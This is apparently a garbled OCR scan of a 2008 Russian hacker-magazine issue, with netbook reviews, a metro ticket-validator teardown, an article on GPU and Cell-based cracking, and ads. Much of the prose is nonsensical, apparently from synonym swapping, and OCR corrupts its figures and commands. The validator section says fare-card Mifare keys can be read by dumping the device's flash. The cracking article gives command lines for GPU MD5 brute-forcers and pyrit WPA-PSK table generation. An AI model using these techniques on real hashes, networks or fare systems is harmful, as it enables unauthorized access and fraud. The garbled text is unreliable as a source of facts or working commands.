оборудова-  ны сенсорным дисплеем диаметром 02 дюйма, ВІиеІооіН-, ЕІЬегпеі- да  ѴѴІ-РІ адаптерами.   Втаким монитором нотбук любо-дорого сканаетза телек да прелестно достаточно себя чуять во этой роли — ТѴ-тюнер дозволено опционально ввести во поставку.     ► 022     ХАКЕР 01 /119/ 08        т"еггигп     ч      ЯР Міпі 0000  Килограммовый  нетбук через НР ради 000 баксов     [Р Раѵіііоп йѵ3500   Мощный 03.3” субноутбук от дизайном  «жидкий металл»     Нетбук НР Міпі 0000 весит безраздельно килограмм, по части шимоза суп малограмотный слабее дюйма равно нужно только $400. При во всех отношениях около этом является полноценным компьюте- пунш для базе Іпіеі Аіогп N270 0.6 ГГц, который™ сможешь всякий раз быть беременным не без; на лицо на сумке другими словами рюкзаке. По заверениям НР, они весть вслед за морочи-  лись не без; клавиатурой равно добились того, ее размеры у Міпі 0000 составляют  92% ото размера клавиатуры стандартного ноутбука. То питаться клава у него почитай такая же, наравне равным образом у обычного ноута. В общем, радикально себя любезный равно высококачественный нетбук, имеющий кинематография со стандартным разрешением  1024x600 равным образом полным набором коммуникаций: ЕІИегпеі-разъемом, двумя  ІІ5В-портами, поддержкой ѴѴІ-РІ да ВІиеіооОі.   Помимо Міпі 0000 черного цвета НР опять же поставляет модификацию от  ярко-красной расцветкой, которая понравится твоей подруге.     Если к тебя ужас важен формальный наружность ноутбука равно необычный, нестан-  дартный проектирование тебя привлекает, ведь Раѵіііоп сІѵЗбОО придется тебе объединение  вкусу. Корпус сего ноута сделан во концепции «жидкий металл» да выгля-  диттак, наравне мнимый спирт отлит с бронзы. Также его традиционно украшает сладкий глазу утонченный вычурный рисунок.   Если но отбросать чужой вид, так останется основательно добротная машинка не без; 03,3-дюймовым дисплеем, камнем Соге20ио 0,26 ГГц, тремя гигами  памяти равным образом винчестером ЗАТАобъемом 020 Гб.   Вместе не без; ноутом, правда, придется оторвать Винду Висту, хотя почто неграмотный сдела-  ешь вследствие хорошего ноутбука?     ХАКЕР 01 /119/ 08     ► 023           ^ іпзійе        I*     МЕТРО:     КИШКИ НАРУЖУ         (КОПАЕМСЯ ВО ВНУТРЕННОСТЯХ ВАЛИДАТОРА"   __   Большинство с нас вседневно пользуются услугами метро, и, наверное, на каждого пускай бы бы единожды приходила на голову дума запустить глаза в середку одного     І с устройств, которые д нем да в ночь неподкупно Шфаняют въезд во подземку.  Мечты сбываются! Разбирать м ы будем безграмотный ко акую-нибудь мелочь, а самый ась? ни вкушать истовый оконечное устройство проверки бесконтактных карточек.     г подопытный ДЕВАЙС   Взглянув получай фотографии, твоя милость враз поймешь, по части нежели речь. Да, сие оный самый  аппарат, тот или другой виситна стене на каждом вестибюле метро. Именно кнему наш брат подходим вместе с карточкой по прошествии неудачной попытки проникнуть чрез турникет  — равным образом наблюдаем беспристрастное: «ПОВТ. ПРОХОД 0 МИН.». Конечно, сие далеко не картина валидатора турникета, да скажу до секрету, ее складка скудно нежели отличается ото нашего подопытного. Внешне сие попросту пластмассовый  ящик. Интерфейсы сношения от пользователем — неконтактный считыватель  карт, затаенный вслед передней в некоторой мере корпуса, равно самостоятельный монитор сверху  красных светодиодах: визитная фотоснимок всех систем метрои«МосГорТран-  са.» На задней части аппарата «растет» разъем,  со через которого терми- налик присоединяется клокальной волокуша вестибюля, да рычагзамка, которым строй крепится ко установочному кронштейну. Сам запор расположен во  нижней части устройства и, на различие через многих приборов подобного класса, сие — единственная щит с посягательства от применением грубой силы.   С прочий стороны, оно да понятно: валидатор висит безграмотный ахти где, да быть все непропорционально кто  попытке покуситься нате казенное добро из-за задом нерадивого наруши- телец не тратя времени даром окажется два сапога пара милиционеров, да песня злодея короче  спета (яе спрашивай , отнюдуже у нас подопытный образец, — Прим,  ред). Что ж, не без; экстерьером терминала всегда более-менее понятно, вследствие чего  приступим ко самому интересному. Берем во грабли отвертку и...   Н ПЛАТФОРМА СЛЕВА — ПЛАТФОРМА СПРАВА   Вывинтив цифра винта, находящиеся по-за устройства, равно разделив его кор-  пус в двум половинки (как скорлупу грецкого ореха), извлекаем содержимое.     Все нутряк терминала размещены получи двух не без; половиной платах.  Что осталось получи «половинке», что и говорить — сие монитор равно порядочно  светодиодных индикаторов красного да зеленого цветов. Рассмотрим чутче оставшиеся две. На одной с них вмиг бросается на шары огромное сумма всевозможных микросхем, МИКРОСХЕ-  МИЩ равно микросхемочек, ворох рассыпухи равно единаче бессчётно лишь интересно-  го. Стало быть, сие главная доход устройства. Поглядим, сколько симпатия внешне  представляет.   Самый большущий «камень» получи и распишись этой плате — Моіогоіа МС68332 (это основной процессор). Точнее говоря, сие весомый 02-битный  микроконтроллер (именно микроконтроллер, эдак наравне спирт слабит для борту  определенное состав периферии будто ІІАПТ равно ѴѴаІсбсІод-таймера).  Платформа получилась старенькая, только проверенная временем. Та ко вроде  уэтого МК перевелся встроенной памяти программ, а мнема данных незначительно  мала, так рядышком не без; камнем прописаны четверик микросхемы ОЗУ (всего  512 Кб) равно одна флешка (тоже получи и распишись 012 Кб). Во флеш-памяти пролегает  управляющая программа, а на оперативе — служебка да логи. Автомат  сохраняет всю информацию относительно приложенных для нему картах впредь до тех пор, временно далеко не отдаст ее в области узы центральномуузлу. Здесь же, на ОЗУ, лежат равным образом  стоп-листы (касается всего лишь турникетных валидаторов) равно криптогра-  фические ключи чтобы проверки валидности билетов ультралайт (ключи  доступа для секторам карточек Мііаге Сіаввіс зашиты изумительный флеш -памяти).   На обстоятельство ущерб магистрального питания заседание «забатареена» хватит за глаза вместительным элементом получи и распишись 0 вольта. При отсутствии  питания спирт позволит ограждать материал на оперативной памяти больше 0-х     ► 024     ХАКЕР 01 /119/ 08          ^ іпгісіе     МАГНИТНЫМ      СЧИТЫВАТЕЛЬ:     ПРИЕМНОЕ   ОТВЕРСТИЕ     ПРИЖИМНЫЕ   ПРОКАТНЫЕ   РОЛИКИ     МАГНИТНАЯ   ГОЛОВКА     РОЛИК  ТЕРМОПРИНТЕРА     ПЕРЕДАЧИ ДАННЫХ,  ПРИСОЕДИНЕННЫЙ КПЛАТЕ  УСИЛИТЕЛЕЙ И КОМПАРАТОРОВ     КАБЕЛИ, ИДУЩИЕ ОТ  ЭЛЕКТРОДВИГАТЕЛЯ  И СОЛЕНОИДА     ШЛЕЙФ ТЕРМОПРИН-  ТЕРА С РАЗЪЕМОМ массированный ШАГОВЫЙ элект-  родвигатель, СПРЯТАННЫЙ  ПОД ШЛЕЙФОМ ТЕРМОПРИН-  ТЕРА     ЕНОИД, ПРИЖИМАЮЩИИ  ГОЛОВКУ ТЕРМОПРИНТЕРА К  БИЛЕТУ      ХАКЕР 01 /119/ 08     ► 025      ПЛИС — КОНТРОЛЛЕР  КЛАВИАТУРЫ И МЕСТ-  НОЙ ПЕРИФЕРИИ     ^ іпзійе      ДИСПЛЕЙ ПРЕОБРАЗОВАТЕЛЬ И НЕ РАСПАЯННАЯ КЛАВИА-     ПИТАНИЯ ДЛЯ МОДУЛЯ ТУРА — ЯРКИЙ ПРИМЕР ТОГО,   СЧИТЫВАТЕЛЯ ЧТО ПЛАТФОРМА ОБЩАЯ     месяцев. Этотже элемент«бэкапит» равно хронометр реального времени.   В общем-то, сие была самая главная пакет аппарата. Все остальное нате плате относится для блоку питания (кстати, конструкция питается через  24 вольт], обвесу камней, интерфейсам от внешним всем миром (только  поглядите получи таковой родимый разъединение из обозначением «Ыеімогк») равным образом  оставшейся периферией — считывателем равным образом дисплеем.   К КОНТАКТ БЕСКОНТАКТА   Бесконтактный считыватель, принятый получи непохожий плате, — сие  «второе сердце» терминала. Именно в угоду него, дозволительно сказать, равно  создавалась весь система. Сам считыватель — сие каждый устройство  производства компании Сетріив.   Для справки: шарашка занимается контактными равным образом бесконтактными  технологиями на банковской сфере да во сфере платежных систем.  Считыватель работает в соответствии с известной беспроволочный технологии  МІІаге (МІкгоп РАРЕ-соІІесііоп Зувіет], которая была разработана да  поддерживалась маленькой австрийской фирмой МІкгоп. Затем, на  1998 году, технологию от потрохами выкупила Рбііірв ветісопбисіогв  (ныне МХР], которая равно по части оный дата ее продвигает. Так в духе нате считы-  вателе неб ылони ед иного упоминания насчёт Рбііірв, а держи всех микро-  схемах красовалось гордое «МІкгоп», не возбраняется предположить, который текущий норма ахти старый, возможно, середины 00-х. На мысли насчёт  древности да наводит здоровенный экранированный радио- группировка равно штабель микросхем на крупных корпусах. Сейчас такие фокусы  реализуются возьми одной МС ото Рбііірв во незатейливом корпусе 00-20.  И ведь, смотри-ка, до сей времени сие до самого этих пор работает :).   Из оставшегося сверху плате железка — программируемая логика, кото- раиса управляет работой считывателя да дисплея; порядочно интер-  фейсных микросхем (расширители портов], ей-ей низкий преобра-  зователь питания в целях нужд считывателя.   г О СОВМЕСТИМОСТИ ВИДОВ   Я сильнее нежели уверен, чтоутебя промелькнула мысль, какже похо-  жи сии терминалы получай аппараты, которые стоят следовать передней дверью  автобусов, троллейбусов равным образом трамваев. Я скажу даже если больше. Они  похожи безвыгодный только лишь внешне, а равным образом внутренне. Те но контуры плат, та а  платформа, под идентичное размещение элементов...   Платы вместе с дисплеем равным образом считывателем заништяк взаимозаменяются.  Дисплей показывает однако верно, ну, правда, считыватель «чуть-чуть невыгодный работает» (что да никак не мудрено — на метрошном варианте стоиттакой  мастодонт, а во автобусном — совсем недавний МРНС531]. И,     разумеется, на автобусном терминале присутствует, исключая прочего,  считыватель магнитных билетов. Он составляет черт-те где 00% лишь  веса автобусного валидатора. Этим считывателем управляет воздавать  дельный жалкий 0-битный микроконтроллер (тоже Моіогоіа], что сверху плате терминала подземный дворец не мудрствуя лукаво безграмотный распаян (как равным образом разъединение  «Мадбеаб» интересах подключения головок равным образом датчиков магнитного счи-  тывателя, а вдобавок разъединение да электроника управления термопринте-  ром].   Это наводит возьми да мы вместе с тобой лесная красавица об унифицированной аппаратной платфор-  ме, которая разрабатывалась до этих пор давно, от расчетом в долгое факт равным образом разумное покрывание новым функционалом. Вот равным образом  получается, зачем ото поколения ко поколению остановка неграмотный меняется равно слабит  со на лицо вечным грузом в духе весь прелести, беспричинно да весь фундамен-  тальные оплошности, которые совершили разработчики.   ОСТОРОЖНО, ДВЕРИ ЗАКРЫВАЮТСЯ...   Конечно, с сих ошибок сейчас никуда безвыгодный убежать, есливкорнене переменить всю конструкцию. С нынешними представлениями автор  можем сказать, что такое? «надо было уделывать всё-таки сверху нормальных 0-битных  МК, — тут строй получилось бы не задавайся да на разы безопас-  нее». По крайней мере, невозможно было бы прямо-таки выпаять микросхему  флеш-памяти равно исчислять ее бери программаторе, лишенный чего проблем пос-  мотрев во дампе ключи А да В интересах карт Мііаге СІавБІс (студенческие,  социальные равным образом проездные]. По сути, ключи — единственная ограда получи и распишись пути подделки сих документов... Ноне овчинка выделки стоит забывать, что такое? во ведь миг у разработчиков малограмотный было такого широкого выбора удобных,  функциональных, быстрых равным образом безопасных микроконтроллеров, кой кушать сегодня. Бедолагам приходилось исполнять в тех плат-  формах, какие были доступны.   Вывод: получи будничный время все перрон потенциально уязвима.  Это означает, аюшки? почти что кто хочешь подкованный на электронике программист  сможет выудить с такого терминала круто конфиденциальную ин-  формацию, и, возможно, инда эксплуатировать ее во незаконных целях.  Конечно, определенные программные ухищрения могут усугубить житьё-бытьё взломщикам, только нетак, какусложнила бы полная невозмож-  ность подсчитывать программу равно дамп оперативки изо устройства.   Поэтому моя особа желаю равно «Метрополитену», равно «МосГорТрансу» скорейшей  смены платформы держи современную да сильнее безопасную.   А всех хакеров, стремящихся рисковать силы держи сих системах,  предостерегу: подобные «попытки» чопорно преследуются в области  закону! зс     ► 026     ХАКЕР 01 /119/ 08      Т08НІВА   І_еасІіпд Іппоѵаііоп »       Х300 - МАСТЕР ИГРЫ     > Новый субноутбук Оозгпіо Х300 от процессорной технологией  Іпіеі® Сепітіпо® 0 во всем своим  агрессивным видом дает  понять, ась? возлюбленный заряжен для беспрецедентную за реалистичности игру.     > Что дальше?   ѵѵѵѵѵѵ.дозтіо.ги   Информационный центр:   8 - 000 - 000 - 05-05 [города РФ]  8 - 095 - 083 - 05-05 [Москва)  ѵѵѵѵѵѵ.ІозЫЬа.сот.ги     Іпіеі, логотип Іпіеі, Сепігіпо, Сепітіпо Іпзісіе, Іпіеі Соге равно Соге Іпзісіе являются товарными  знаками корпорации Іпіеі на США равно других странах. На правах рекламы        АНДРЕЙ КОМАРОВІ     Некоторое промежуток времени отворотти-поворотти Сеть вводные положения п]эостожишеть заметками по отношению па^ллель  шх вычислениях для видеокарте. Своего рода сенсация: вычислительных^     \ современных видеокарт, которые приоОретает с головы люои-   Т У. I Щ ‘і ШГЛЛ^Ж ІГЖР^   ать, на практике в полном смысле слова достаточно, с тем основать слож елка поиг     ендеринг изображений     [технологии по-видимому Кау Тгасіп% да аж открыть алгоритмы ши     рс_гопе     О Нои*     В ФЕВРАЛЬ НАУЧИЛ МЕНЯ ЖИТЬ,   ЯНВАРЬ НАУЧИЛ МЕНЯ ЖДАТЬ!   Еще на начале февраля 0007 возраст бери всеобщее обзор был  представлен главнейший заготовленный набор инструментов в целях доступа ко инструкциям графического ускорителя. СІШАТооІкИ/СІШАЗОК  (тогда единаче на бета-исполнении) позволяла продать получи языке  программирования Си алгоритмы, выполняющиеся держи графических  процессорах ускорителей ОеРогсе восьмого поколения равным образом старше.   В качестве АРІ используются транслированные для С выражения,  которые лишенный чего проблем из чего явствует возможным задействовать на любых  приложениях. Отныне программисту было нужно чуть обзавес-  тись соответствующим ЗйК, а вдобавок скачать от официального сайта  КІѴІЕІІА программа-драйвер СІША, какой-никакой связывается из ОігесіХ, 0реп6І_ равным образом  С-компилятором для того ВРІІ. Замечу, что такое? особенно N VI □ ІА является  разработчиком равно обладателем патента возьми эту технологию, даже если возлюбленная равно поддерживается другими производителями, например, АН. Для  работы в теории подойдут модели Х1600, Х1800, равным образом Х1900, одна ко ваш покорный слуга упорно рекомендую XI 000. В крест ото Х1800.Х1900 при-  меняет невыгодный сердце компьютера Е520/П530, а П580. Он дает важный повышение  производительности со своими 08 шейдерными конвейерами,  используемыми про вычислений.     Важное приглашение — видеокарта должна обладать, в духе минимум, 012  Мб памяти — на противном случае ОРІІ-клиентсильнозагрузитмашину  (бывают да исключения: например, XI 050Рго РСІ-Е из 056 МБ памяти немного  казывает в полном смысле слова неплохую производительность). Для туалет кодинга не возбраняется обнаружить специальную среду разработки СІЮАТооІкК (не путать вместе с  С1ЮА30К). Она включаете себя:   • пѵсс (специальный «нативный» транслятор С);   • библиотеку ВБА5 пользу кого работы слинейной алгеброй (например, на  приведенныхтам примерах снедать аналоги теста БІМРАСК, используемого по части нынешний с утра до ночи про выявления вычислительных мощностей суперкомпьюте-  ров; в области назначению является «узким» клоном Іпіеі МаіЬ Кегпеі ЫЬгагу);   • ЕРТ-библиотеку (отвечаетза операции фильтрации цифровых изобра-  жений  со использованием результатов преобразований Фурье);   • профайлер;   • равным образом доколе сызнова мокроватый отладчик.   В ГОТОВЫЕ РАЗРАБОТКИ НА США, ИЛИ РАСПРАВА НАД М05   О том, который методика работает да работает классно, допускается рассуждать поуже  сейчас. На основе СІЮА были разработаны десятки утилит. Приве-  дем как никогда интересные интересах нас, а особенно — годные пользу кого взлома  хэшей МР5:     ► 028     ХАКЕР 01 /119/ 08                рс_гопе     га РЛдатір\п^^\ііігіѴм"Р_тй5_ст«кег,* . ?     | сіі э 0     ВЛГіНР ""Об ЬрЧІеР&"чІег ѵО. 0        Щір : // 0.14, Ьу . " ей /пнІБ   *р : //3 . 04,. Ъу/г равным образом /шгіі     гді.іы чмнііі &  245.164 ЧНйіН і  ?^рЫ$т     СРІ!     №мН: 0161  Кру ІГйШкЕІ!     Тсглі : 045,164 ММЛ-.-Н "іеі;   5сІ ? В ? -1 "^П 0ВЬй91к№5 а 0’ бЬБбе 00     ^и(з&тс| Водан изо самых быстрых бесплатных С1ЮА тсІ5-кракеров — обрати подчеркнуть что получи срок перебора        • ЬагвѴѴР 0.8 у/г 05).   На настоящий моментна пѴісІіа 06000Т/С2Р 0 ГГцСІЮА-версия  проверяетЗбО миллионов ключей во секунду, а 05Е2 — 008  миллионов. Для работы крайнежелательно пустить в дело  64-битную операционку, пускай бы 02-битная трансформация утилиты как и доступна. Синтаксис с целью запуска следующий:   ВагзИР_В8Е2_х64 . ехе -Ъ 01685Й282Й79098Ь89ЬЙ65  а916Ь66с90 -X "030405313233" -тіп_1еп 02   Где -X добавляет дополнительные значения в целях перебора,  — тіп_1еп вносит максимальную длину пароля.   • пѵСисІа гш)5 ( бНр5:/Логит.апбсЬа<:.ги/1:Ьгеаб62728.Ыт[ |.  Дата обслуживающая программа заточена для того исполнения нате 0Р9800. Неуди-  вительно, благодаря чего равно как мультипроцессоров на ѲР88000ТХ   — целых 0 0 штук! Причем, во каждом мультипроцессоре 0 тратить  цессоров; всего получаем 0 08. Каждый вычислитель ІМѴІсІіа  выполняет инструкцию вслед за фошка такта (ѲР9800 0400  МГц), хотя восемь процессоров на 02-х потоках выполняют  одинаковую инструкцию как и ради четы ре такта; ведь есть,  (128*4) 012 потока сверху ѲР8800ЮВА будут материализовываться  со пирушка а скоростью, во вкусе нате 0 08-ядерном Репііит 0 000 МГц.  Чуешь разницу? пѵСисІа т05 распространяется во исход-  ных кодах, что-то оченьлюбопытно равно питательно в целях остальных  разработчиков.   Синтаксисзапуска:   пѵСТГОА_тй5 . ехе с=1оиега1рЬа-питегіс Г=тй5раз.  ЕхЦ з=1 е=9 Ъ=70 о=Гіпй. РхЦ   Где не без; — сверток символов с сНагвеІ.ІхІ, і — файл, из каких мест бе-  рем хэши, во — начальная расстояние пароля, е — конечная продолжительность  пароля (15 тах], Ь — (( наличность процессоров ) / 0) *5 либо  экспериментируем, насчёт — файл, пупок развяжется будутзаписываться  найденные пароли.     Давай подумаем, а пользу кого каких вновь задач нам не вдаваясь в подробности могут уйти такие вычислительные возможности? К  примеру, многие системные администраторы применяют получай своих беспроводныхточках доступа безвыгодный штатную защиту  а усиленную (Р5Ы/Р5МА) вместе с использованием ѴѴРА равным образом ѴѴРА2. И с чего бы невыгодный отправить в рот ее взломать?   Н ПРОЩАЕМСЯ С ЖРА2:   БЕСПРОВОДНЫЕ СЕТИ ОПЯТЬ УЯЗВИМЫ   Совсем только что шарага ЕІсотзоН, знаменитая своими  релизами ради взлома всевозможных паролей, подала  заявку нате патентсописанием новойтехнологии подбора  паролей во беспроводных сетях, использующих стандарты  безопасности ѴѴРА да ѴѴРА2. По заявлениям разработчи-  ков, методика обеспечиваетвдесятки крат больше высокую резвость подбора пароля сообразно сравнению со стандартны-  ми средствами. Проведенные испытания показали, что такое? строгий родничек ѴѴІ-РІ подбирается во 0 0-1 0 однова быстрее, буде пустить брутфорс с ЕІсотзоО: получай ноутбуке, уком-  плектованном видеокартой І\ІѴЮІАОеРогсе 0800М либо — либо  9800М. А использован петого а самого ПО получи и распишись настольном  ПК, оснащенном двумя иначе несколькими картами ІМѴШІА  ОТХ280, повышает эффективность приложения паче нежели на 000 раз. Наряду вместе с сим существует ореп-воигсе чертеж  ругіі І ЬКр://сосІе.аооаІе.сот/р/оЦі . ). устремленный получай взламывание  ѴѴРА Р5К, нате котором я равным образом остановимся. Рассмотрим, поче-  му ѴѴРА-Р5К (1/2) по сути взломать. Ниже приведена план  подключения клиента для точке доступа.   Стало быть, юзер находит невод равно начинает коннект.  Он вводит пароль, что неразлучно  со названием путы ($510)  формирует сдвоенный разъяснение (Раіпл/іве Мавіег Кеу — РМК]. Затем пациент объясняетточке доступа, в чем дело? симпатия хочетавторизиро-  ваться. В ответточка доступа генерит произвольное число.  Тогда клиентвырабатываетсвое число, состоящее изо  белиберды, полученного случайного числа точки доступа      > Ііпкз   • Ресурс, посвя-  щенный ОС Еіпих возьми  процессорах СеІІ:   Ьзс.ез/ргоіесів/   Оеерсотрибпа/   Ііпихопсеіі     • Информация с целью  разработчиков при-  ложений не без; использо-  ванием мощностей  видеокарт:  пѵісііа . ги/оЬіесі/сисІа  Іеагп ги.ЫтІ     • Курслекций сообразно  паралелльными зарабатывать  числениям ФизТеха:   пѵісПа.ги/оЫесі/сисіа  зіаіе ипіѵегзИѵ  соигвев ги.ЫтІ     ХАКЕР 01 /119/ 08     ► 029      У >   ■     рс_20пе     ■     ^пі і      Таблица из числом подсчитанных РМКдляѴѴРА-ключа  со использованием ругіі равным образом РМК — по сию пору сие называется Раіга/івеТгапвіепІ Кеу. Клиент  посылает хотспоту лишь белиберду (свое рандомное  число), подписанную ключом РТКІоно далеко не зашифровано,  а нетрудно значится со статусом 0ІЗІ\ІЕ0).Хотспот получает сие число, — ступень доступа, естественно, знает лозунг  клиента равным образом РМК, благодаря тому может следовать попросту подсчитать РТК, — равным образом  проверяет адрес целостности с подписанной белиберды.  Если  со ним по сию пору во порядке равным образом используется действенный  РТК- ключ, ведь клиенту высылают фурор нате предстоящий  диалог, заверив его, на свою очередь, РТК. Клиент в свою очередь тратить  веряет адрес целостности равно то, в чем дело? РТК подлинный, — потом зачем продолжает работу еще во защищенном канале связи.  Немаловажным является выносливость самого пароля равно кое- идеже — обычность $$Ю на формирования РМК.  Подобрав РМК, поглощать вероятность вмешаться во сеть, вследствие чего что такое? единовластно с его параметров можетбыть угадан простым пе-  ребором ради зачастую используемого 05Ю. Списки особо  используемых $$Ю позволительно выискать по мнению адресу НПоѴАллллл/.ѵлаІе.  пеі/арв/арв/таіп/евісівіаів . Пароль в полном смысле слова положительно признать  словарной атакой. Разберем случай, в некоторых случаях заглавие тенета  (55Ю:КНЕМиМ) нам известно. Ругіі сгенерит воз  РМК-ключей во единую таблицу (не секрет, который что бог на душу положит вычис-  ление можетбыть представлено во виде таблицы), которую во  дальнейшем дозволительно скормить ранее существующему софту с целью  взлома ѴѴРА(соѴѴРАІІу). Кстати говоря, таблицы размером  40 Гб ваш покорнейший слуга когда-то выкладывал для одном с популярных блогов в соответствии с информационной безопасности. Итак:     РІауЗіаІіоп 0 или — или ХЬох. Сошлись, на итоге, почто облюбовать желательно за  критерию вышедших игр, а ни перед каким видом невыгодный согласно техническим харак-  теристикам. А тем далеко не менее вычислительные мощности современных  приставокзаслуживаютвнимания! Окинем пристальным взо- пунш характеристики процессора РІауЗіаІіоп 0 — СеІІ В своем  арсенале Сеііимеетнативный вычислитель (РРІІ) из наличием  8 ядер (5РІІ); во приставках нового поколения бренда Золу их  планируется увеличитьдо 02. Каждыйтакой процессор, в области  словам создателей, станется совершать32 млрд, операций от плавающей точкой (ОідаРІорв) во секунду, а фошка целочис-  ленных блока вкупе — 02 млрд, операций (Ѳ0Р8) на секунду.  Над проектом такого многоядерного процессора трудились  три компании — Зопу, ТовбіЬа да ІВМ. Причем, принципы, зало-  женные во архитектуру нового чипа, были разработаны единаче на  начале 0000 годы инженерами ІВМ. Идея массового паралле-  лизма, нате которой базируется СеІІ, работаетвтакназываемой  «клеточной архитектуре» («сеііиіаг агсбііесіиге»), В ней пользу кого со-  здания суперкомпьютеров используется обилие однотип-  ных процессоров (от 00 тыс. перед 0 миллиона), отдельный с которых  оснащен собственным контроллером РАМ равно определенным  объемом самой оперативной памяти. Наступаеттрогательный секунда — а возможноли настрочить нам близкие приложения подо таковский камень, затем в чем дело? сформировать бюджетный арена с целью  взлома самых разнообразныххэшей?Для сего спервоначала об-  ратимся кофсайтуодногоиз пап СеІІ — ІВМ [ аІрЬаѵѵ  сот/іесб/сеЦзѵѵ ). Пакет разработчика (ІВМ СеІІ ВгоасІЬапсІ  ЕпдіпеЗоіІѵѵаге Оеѵеіортепі Кіі) распространяется во виде  150-образа. Вообще, СеІІ поддерживает двум вариации ССС:  рри-дссиври-дсс. Методика работы не без; этими двумя пакетами  проста:  со через ври-дсс пишущий сии строки пишем модули чтобы исполнения держи отдельном ядре, а из через рри-дсс выполняем их цент-  рализовано для процессоре. Естественно, рекомендуется рас-  пределять отдельные подсчеты получи и распишись отдельное ядро, а в дальнейшем сочинять на РРІІ исполняемую обертку, которая бы подключала  модули для того выполнения для каждом изЗРІІ.   Общий подъезд продемонстрирован сверху примере:   ТоисЫіеІІо_5ре.с   #іпс1ийе <зСйіо.1і>   Уіпсіисіе <зри_іпЫіпзісз . Ь>  иг шаіп (ипзідпей Іопд Іопд і Й )   {   ргіпСЕ ( "Неііо Егот 0РІІ : 0х%11х\п" , ІЙ) ;  геСигп 0 ;   >      > ѵѵагпіпд   Статья написана пользу кого ознакомления  стемой. В случае  использования этой  информации на тратить  тивозаконных целях, проверка да пишущий сии строки  ответственности безвыгодный  несут.     ругіС.ру -е ККЕМЬШ сгеаСе_еззій  ругіС.ру -Г йісС.СхС ітрогС_раззиогйз (импор-  тируем лексикон паролей)   ругіС.ру ЪаСсЬргосезз (процесс генерации вдоволь  шел)   Полученные результаты позволено откровенный экспортировать:   ругіС.ру -е ККЕМЬШ -Е оиСриС.сои ехрогС_  совдраССу   ѲРІІ позволяет нам создать после намного самый малый эра  огромное количество РМК. С их через судебное дело взлома ѴѴРА-  РЗКзаметноуменьшается соответственно времени.   Н СОВРЕМЕННЫЕ КОНСОЛИ,   ИЛИ «ОН! ІТ 05 СКАСКЕТАТІОЫ!»   Однажды автор этих строк застал одного своего знакомого после серьезным  умственным процессом: оный пытался решить, что-то а ему купить:     После компиляции не без; флагом — о, обзовем нашу программу подина 0 ядро, какврсМтеІІо. Далее пишем обертку почти цент-  ральный процессор:   ТоисЬ рре_(іеІІо.с   ііпсіийе <1іЬзре.1і>   # іпсіийе <зСй1іЪ.1і>   {Подключаем нашу программу зри_Гіе 0 0 что до }  ехГегг зре_ргодгат_1тапй1е_С зри_Ье11о;  іпС шаіп()   {   /* Создаем река равным образом записываем его ІЙ */  зреій_С зре_ій=зре_сгеаСе_С1ігеай (   О, &СезС_Ъапй1е, ШЬЬ, ШЬЬ, - 0, 0);   ІпС зСаСиз;   /* Проверяем ошибки */  і Г (зре_ій==0 ) {   реггог ( "ШаЫе Со сгеаСе ЭРЕ ЕЬгеай") ;  ехіС (1) ;     ► 030     ХАКЕР 01 /119/ 08           СІ-Р-315     Представь... бесшумная занятие из ярким результатом. Новая рейсшина цветных лазерных  принтеров равно многофункциональных устройств Сатта" через Затзипд создана с заранее обдуманным намерением интересах  тебя. Эти модели - самые компактные во своем классе равным образом далеко не занимают бессчётно места,  а сознательно разработанные тонеры делают цветные отпечатки яркими равным образом насыщенными.   Хочешь позитива? Прими забота во промоакции Затзипд «Ищи цвет». Купи многокрасочный лазеровый печатающее устройство иначе говоря МФУ Затзипд СбР-300, СІ_Р-3(Щ С1.Р-310, СІ_Р-ЗШ, СІ.Р-315, С6Р-315ѴѴ,  СбХ-21 00, СбХ-21 00Ы, СІ.Х-3170РМ, СбХ-3175, С6Х-3175Ы, С6Х-3175РМ да С6Х-3175РѴѴ да бери на пешкеш дизайнерскую футболку, разработанную сознательно в целях тебя!     Тамма     аХ-3175        Гамма положительных эмоций во подарок! раскрашиваемый лазеровый печатающее устройство   8ат$ішд банта     Единая услуги поддержки: 0-800-555-55-55 (звонок сообразно России бесплатный).     Галерея $ат$ипд: г. Москва, ул. Тверская, д. 0/17, стр. 0. ѵѵѵѵѵі/.затзипд.сот. Товар сертифицирован. Реклама.        Тестирование екоррсти работы МР5- взломщиков     ■ ННІ"і*-! Ѵ-НІ Л НН     ІЙ Т» Э№ ДЙ   <Ѵ4іІ(НГШІЧІи      Исследовательский исследование нашего соотечественника Сваричевского Михаила Александровича — создателя ВагвѴѴР (одного изо самых быстрых  тсіб-крекеров для 0РІІ)     >   /* Ждем завершения */  зре_иаіб ( зре_ій, Ьзбабиз, 0 ) ;  геСигп 0 ;   >   зри-дсс зре_1іе11о.с -о зре_Ье11о   рри-етЬейзри зри_ргодгат_Ьапй1е зре_1іе11о зре_Ье11о_   сзЕ . относительно   рри-дсс рре_1іе11о.с зре_ехатр1е_сзб . насчёт -Ізре -о рре_Ье11о   Раз контия ведем выступление об использовании многопоточности, так корректным хорошенького понемножку капелька изъяснить в рассуждении библиотеке 0_ІЬ$РЕ. Эталиба позволяет программисту вонзаться котдельномуЗРЕ-процессу. Внесуясность:то, ась? исполняется возьми одном 0РІІ, носит заголовок 0РЕ (Зупегдівііс Ргосеввог Еіетепі). Она заключает настил ьзовательские инструкции про управления 0РЕ сверху отдель- утнапиштим операционной системе, а именно: кончать его, задавать уверенный приоритетна материализация равным образом т.п. В свою очередь, то, что-то хорошенького понемножку подсоединять вместе равным образом совершать совершенно 0РЕ держи центральном процессоре (РРОІ  — РИувісв Ргоссевіпд ІІпііІ, называется РРЕ (Рбувісв Ргосеввіпд Еіетепі). С  недавнего времени біЕВРЕ обзавелась второстепенный версией, равным образом во текущем СеІІЗОК  распространяется уж обновленная книжное собрание (с около критичных с целью тратить  граммиста новаций). иЬ$РЕ2задаетабсолютно новые способы создания  отдельного потока. Пример подобного стих твоя милость найдешь для нашем диске.   Н ЫГШХ НА РЬАУЗТАТЮЫЗ — НАШ ВЕРНЫЙ ДРУГ!   В качестве операционной системы пользу кого организации вычислений  используется портированная издание Еіпих"а. Самая популярная равно  целенаправленно заточенная для того запуска бери консоли: Ѵеііоѵѵ иод Ыпих.  Впрочем,  со никак не меньшим успехом твоя милость можешь ввести любые дистрибу-  тивы пингвина на ррс-версиях: жениться хоть бы Ребога Ыпих либо — либо Визе. В них еще предустановлен СеІІВОК, правда, пока что старой версии, лишенный чего поддержки  ІІЬвре2, ноты можешь скачать ее неслиянно на .грт-пакете да назначить  привычной командой:     # идеб ЬЫгр : / /иии.Ьзо . ез/ргот есбз/йеерсотриЬіпд/   1іпихопсе11/се11зіти1абог/зсІк2 . 0/1іЬвре2-2 . 0 . 0-1 . зге . грт   # грт -і 0іЬзре2-2 . О . 0-1 . зге . грт   Почему как бтых 